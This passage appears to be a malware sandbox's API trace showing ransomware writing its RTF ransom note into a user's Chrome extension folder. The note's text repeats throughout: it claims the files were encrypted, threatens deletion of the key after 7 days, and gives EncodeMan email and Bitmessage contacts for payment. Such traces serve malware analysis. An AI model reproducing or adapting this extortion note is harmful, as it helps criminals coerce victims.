\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2466d08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nng1033 ATENTION!!!\\par\r£8", lpUsedDefaultChar=0x0) returned 8717 [0286.389] WriteFile (in: hFile=0x2f0, lpBuffer=0x2466d08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2466d08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.389] CloseHandle (hObject=0x2f0) returned 1 [0286.455] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0286.455] GetLastError () returned 0x2 [0286.455] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.475] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.475] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 